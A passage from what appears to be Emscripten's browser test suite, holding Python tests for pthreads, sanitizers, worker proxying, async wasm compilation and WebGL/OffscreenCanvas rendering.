self.btest_exit(test_file('pthread/test_pthread_once.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@requires_threads
def test_pthread_spawns(self):
self.btest_exit(test_file('pthread/test_pthread_spawns.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '--closure=1', '-sENVIRONMENT=web,worker'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest_exit(test_file('pthread/test_pthread_volatile.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest_exit(test_file('pthread/test_pthread_thread_local_storage.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-sASSERTIONS'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest_exit(test_file('pthread/test_pthread_condition_variable.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest_exit(test_file('pthread/test_pthread_printf.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sLIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest_exit(test_file('pthread/test_pthread_iostream.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
@requires_threads
def test_pthread_unistd_io_bigint(self):
self.btest_exit(test_file('unistd/io.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sWASM_BIGINT'])
# Test that the main thread is able to use pthread_set/getspecific.
@also_with_wasm2js
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest_exit(test_file('pthread/test_pthread_setspecific_mainthread.c'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS'])
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest_exit(test_file('pthread/test_pthread_file_io.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8']]:
self.btest_exit(test_file('pthread/test_pthread_supported.cpp'), args=['-O3'] + args)
@requires_threads
def test_pthread_dispatch_after_exit(self):
self.btest_exit(test_file('pthread/test_pthread_dispatch_after_exit.c'), args=['-sUSE_PTHREADS'])
# Test the operation of Module.pthreadMainPrefixURL variable
@requires_threads
def test_pthread_custom_pthread_main_url(self):
self.set_setting('EXIT_RUNTIME')
ensure_dir('cdn')
create_file('main.cpp', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
_Atomic int result = 0;
void *thread_main(void *arg) {
result = 1;
pthread_exit(0);
}
int main() {
pthread_t t;
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
assert(result == 1);
return 0;
}
''')
# Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-sWASM=0', '-sIN_TEST_HARNESS', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-o', 'test.html'], reporting=Reporting.JS_ONLY)
shutil.move('test.worker.js', Path('cdn/test.worker.js'))
if os.path.exists('test.html.mem'):
shutil.copyfile('test.html.mem', Path('cdn/test.html.mem'))
self.run_browser('test.html', '', '/report_result?exit:0')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_file('shell2.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-sWASM=0', '-sIN_TEST_HARNESS', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-o', 'test2.html'], reporting=Reporting.JS_ONLY)
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?exit:0')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), that it's not a deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest_exit(test_file('pthread/test_pthread_proxying_in_futex_wait.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest_exit(test_file('pthread/test_pthread_sbrk.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-sABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-sINITIAL_MEMORY=128MB'])
# Test that -sABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-sUSE_PTHREADS']]:
self.btest(test_file('gauge_available_memory.cpp'), expected='1', args=['-sABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest_exit(test_file('pthread/test_pthread_run_on_main_thread.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest_exit(test_file('pthread/test_pthread_run_on_main_thread_flood.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async(self):
self.btest_exit(test_file('pthread/call_async.c'), args=['-sUSE_PTHREADS'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread/call_sync_on_main_thread.js')])
self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-O3', '-sUSE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_sync_on_main_thread.js')])
self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_sync_on_main_thread.js'), '-sEXPORTED_FUNCTIONS=_main,_malloc'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread/call_async_on_main_thread.js')])
self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-O3', '-sUSE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_async_on_main_thread.js')])
self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
for args in [['-sMODULARIZE', '-sEXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')], ['-O3']]:
self.btest_exit(test_file('pthread/test_pthread_global_data_initialization.c'), args=args + mem_init_mode + ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sPTHREAD_POOL_SIZE'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
args = ['-sWASM_ASYNC_COMPILATION=0']
self.btest_exit(test_file('pthread/test_pthread_global_data_initialization.c'), args=args + mem_init_mode + ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sPTHREAD_POOL_SIZE'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest_exit(test_file('pthread/test_pthread_clock_drift.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest_exit(test_file('pthread/test_pthread_utf8_funcs.cpp'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test the emscripten_futex_wake(addr, INT_MAX); functionality to wake all waiters
@also_with_wasm2js
@requires_threads
def test_pthread_wake_all(self):
self.btest_exit(test_file('pthread/test_futex_wake_all.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sINITIAL_MEMORY=64MB'])
# Test that stack base and max correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest_exit(test_file('pthread/test_pthread_stack_bounds.cpp'), args=['-sUSE_PTHREADS'])
# Test that real `thread_local` works.
@requires_threads
def test_pthread_tls(self):
self.btest_exit(test_file('pthread/test_pthread_tls.cpp'), args=['-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@requires_threads
def test_pthread_tls_main(self):
self.btest_exit(test_file('pthread/test_pthread_tls_main.cpp'), args=['-sUSE_PTHREADS'])
@requires_threads
def test_pthread_safe_stack(self):
# Note that as the test runs with PROXY_TO_PTHREAD, we set TOTAL_STACK,
# and not DEFAULT_PTHREAD_STACK_SIZE, as the pthread for main() gets the
# same stack size as the main thread normally would.
self.btest(test_file('core/test_safe_stack.c'), expected='abort:stack overflow', args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sSTACK_OVERFLOW_CHECK=2', '-sTOTAL_STACK=64KB'])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-gsource-map']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
@no_firefox('https://github.com/emscripten-core/emscripten/issues/15978')
def test_pthread_lsan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-gsource-map']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@requires_threads
def test_pthread_asan_use_after_free(self):
self.btest(test_file('pthread/test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '--pre-js', test_file('pthread/test_pthread_asan_use_after_free.js')])
@requires_threads
def test_pthread_asan_use_after_free_2(self):
# similiar to test_pthread_asan_use_after_free, but using a pool instead
# of proxy-to-pthread, and also the allocation happens on the pthread
# (which tests that it can use the offset converter to get the stack
# trace there)
self.btest(test_file('pthread/test_pthread_asan_use_after_free_2.cpp'), expected='1', args=['-fsanitize=address', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=1', '--pre-js', test_file('pthread/test_pthread_asan_use_after_free_2.js')])
@requires_threads
def test_pthread_exit_process(self):
args = ['-sUSE_PTHREADS',
'-sPROXY_TO_PTHREAD',
'-sPTHREAD_POOL_SIZE=2',
'-sEXIT_RUNTIME',
'-DEXIT_RUNTIME',
'-O0']
args += ['--pre-js', test_file('core/pthread/test_pthread_exit_runtime.pre.js')]
self.btest(test_file('core/pthread/test_pthread_exit_runtime.c'), expected='onExit status: 42', args=args)
@requires_threads
def test_pthread_trap(self):
create_file('pre.js', '''
if (typeof window === 'object' && window) {
window.addEventListener('error', function(e) {
if (e.error && e.error.message.includes('unreachable'))
maybeReportResultToServer("expected exception caught");
else
maybeReportResultToServer("unexpected: " + e);
});
}''')
args = ['-sUSE_PTHREADS',
'-sPROXY_TO_PTHREAD',
'-sEXIT_RUNTIME',
'--profiling-funcs',
'--pre-js=pre.js']
self.btest(test_file('pthread/test_pthread_trap.c'), expected='expected exception caught', args=args)
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
def test_main_thread_em_asm_signatures(self):
self.btest_exit(test_file('core/test_em_asm_signatures.cpp'), assert_returncode=121, args=[])
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest_exit(test_file('core/test_em_asm_signatures.cpp'), assert_returncode=121, args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sASSERTIONS'])
@requires_threads
def test_main_thread_async_em_asm(self):
self.btest_exit(test_file('core/test_main_thread_async_em_asm.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sASSERTIONS'])
@requires_threads
def test_main_thread_em_asm_blocking(self):
create_file('page.html', read_file(test_file('browser/test_em_asm_blocking.html')))
self.compile_btest([test_file('browser/test_em_asm_blocking.cpp'), '-O2', '-o', 'wasm.js', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
self.run_browser('page.html', '', '/report_result?8')
# Test that it is possible to send a signal via calling alarm(timeout), which in turn calls to the signal handler set by signal(SIGALRM, func);
def test_sigalrm(self):
self.btest_exit(test_file('test_sigalrm.c'), args=['-O3'])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', test_file('canvas_style_proxy_shell.html'), '--pre-js', test_file('canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(test_file('canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(test_file('custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', test_file('custom_messages_proxy_shell.html'), '--post-js', test_file('custom_messages_proxy_postjs.js')])
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-sWASM=0']
print('plain html')
self.compile_btest([test_file('in_flight_memfile_request.c'), '-o', 'test.js'] + opts)
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, returncode in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-sWASM_ASYNC_COMPILATION'], 1), # force it on
(['-O1', '-sWASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, returncode)
self.btest_exit('binaryen_async.c', assert_returncode=returncode, args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest_exit('binaryen_async.c', assert_returncode=1, args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
@parameterized({
'': ([],),
'asan': (['-fsanitize=address', '-sINITIAL_MEMORY=128MB'],)
})
def test_manual_wasm_instantiate(self, args=[]):
self.compile_btest([test_file('manual_wasm_instantiate.cpp'), '-o', 'manual_wasm_instantiate.js'] + args)
shutil.copyfile(test_file('manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
ensure_dir('cdn')
create_file('shell2.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
self.compile_btest([test_file('browser_test_hello_world.c'), '--shell-file', 'shell2.html', '-o', 'test.html'])
shutil.move('test.wasm', Path('cdn/test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
@also_with_threads
def test_utf8_textdecoder(self):
self.btest_exit('benchmark_utf8.cpp', 0, args=['--embed-file', test_file('utf8_corpus.txt') + '@/utf8_corpus.txt', '-sEXPORTED_RUNTIME_METHODS=[UTF8ToString]'])
@also_with_threads
def test_utf16_textdecoder(self):
self.btest_exit('benchmark_utf16.cpp', 0, args=['--embed-file', test_file('utf16_corpus.txt') + '@/utf16_corpus.txt', '-sEXPORTED_RUNTIME_METHODS=[UTF16ToString,stringToUTF16,lengthBytesUTF16]'])
@also_with_threads
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-sTEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-sTEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
# pthread TextDecoder support is more complex due to
# https://github.com/whatwg/encoding/issues/172
# and therefore the expected code size win there is actually a loss
if '-pthread' not in self.emcc_args:
self.assertLess(td_without_fallback, just_fallback)
else:
self.assertGreater(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure=1', '-sINCOMING_MODULE_JS_API=[]', '-sENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5500), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sOFFSCREENCANVAS_SUPPORT', '-lGL'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
@disabled('This test is disabled because current OffscreenCanvas does not allow transfering it after a rendering context has been created for it.')
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sOFFSCREENCANVAS_SUPPORT', '-lGL'])
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest_exit('gl_only_in_pthread.cpp', args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sOFFSCREENCANVAS_SUPPORT', '-lGL', '-sOFFSCREEN_FRAMEBUFFER'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest_exit('webgl_draw_triangle.c', args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-sFULL_ES2=1'])
# Tests for WEBGL_multi_draw extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
@requires_graphics_hardware
def test_webgl_multi_draw(self):
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
# Tests for base_vertex/base_instance extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
# If testing on Mac, you also need --use-cmd-decoder=passthrough to get this extension.
# Also there is a known bug with Mac Intel baseInstance which can fail producing the expected image result.
@requires_graphics_hardware
def test_webgl_draw_base_vertex_base_instance(self):
for multiDraw in [0, 1]:
for drawElements in [0, 1]:
self.btest('webgl_draw_base_vertex_base_instance_test.c', reference='webgl_draw_instanced_base_vertex_base_instance.png',
args=['-lGL',
'-sMAX_WEBGL_VERSION=2',
'-sOFFSCREEN_FRAMEBUFFER',
'-DMULTI_DRAW=' + str(multiDraw),
'-DDRAW_ELEMENTS=' + str(drawElements),
'-DEXPLICIT_SWAP=1',
'-DWEBGL_CONTEXT_VERSION=2'])
@requires_graphics_hardware
def test_webgl_sample_query(self):
cmd = ['-sMAX_WEBGL_VERSION=2', '-lGL']
self.btest_exit('webgl_sample_query.cpp', args=cmd)
@requires_graphics_hardware
def test_webgl_timer_query(self):
for args in [
# EXT query entrypoints on WebGL 1.0
['-sMAX_WEBGL_VERSION'],
# builtin query entrypoints on WebGL 2.0
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2'],
# EXT query entrypoints on a WebGL 1.0 context while built for WebGL 2.0
['-sMAX_WEBGL_VERSION=2'],
]:
cmd = args + ['-lGL']
self.btest_exit('webgl_timer_query.cpp', args=cmd)
# Tests that -sOFFSCREEN_FRAMEBUFFER rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
# Tests all the different possible versions of libgl
for threads in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]:
for version in [[], ['-sFULL_ES3'], ['-sFULL_ES3']]:
args = ['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1'] + threads + version
print('with args: %s' % str(args))
self.btest_exit('webgl_draw_triangle.c', args=args)
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest_exit('test_webgl_no_auto_init_extensions.c', args=['-lGL', '-sGL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-sMAX_WEBGL_VERSION', '-sOFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# VAO path on WebGL 1.0
['-sMAX_WEBGL_VERSION'],
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-sOFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1']
self.btest_exit('webgl_offscreen_framebuffer_swap_with_bad_state.c', args=cmd)
# Tests that -sWORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest_exit('webgl_draw_triangle_with_uniform_color.c', args=['-lGL', '-sWORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-sMAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@parameterized({
'': ([False],),
'asyncify': ([True],),
})
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
def test_webgl_offscreen_canvas_in_proxied_pthread(self, asyncify):
cmd = ['-sUSE_PTHREADS', '-sOFFSCREENCANVAS_SUPPORT', '-lGL', '-sGL_DEBUG', '-sPROXY_TO_PTHREAD']
if asyncify:
# given the synchronous render loop here, asyncify is needed to see intermediate frames and
# the gradual color change
cmd += ['-sASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest_exit('gl_in_proxy_pthread.cpp', args=cmd)
@parameterized({
'proxy': (['-sPROXY_TO_PTHREAD'],),
'': ([],),
})
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self, args):
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-sOFFSCREENCANVAS_SUPPORT', '-sOFFSCREEN_FRAMEBUFFER']]:
cmd = args + args2 + args3 + ['-sUSE_PTHREADS', '-lGL', '-sGL_DEBUG']
print(str(cmd))
self.btest_exit('resize_offscreencanvas_from_main_thread.cpp', args=cmd)
@requires_graphics_hardware
def test_webgl_simple_enable_extensions(self):
for webgl_version in [1, 2]:
for simple_enable_extensions in [0, 1]:
cmd = ['-DWEBGL_CONTEXT_VERSION=' + str(webgl_version),
'-DWEBGL_SIMPLE_ENABLE_EXTENSION=' + str(simple_enable_extensions),
'-sMAX_WEBGL_VERSION=2',
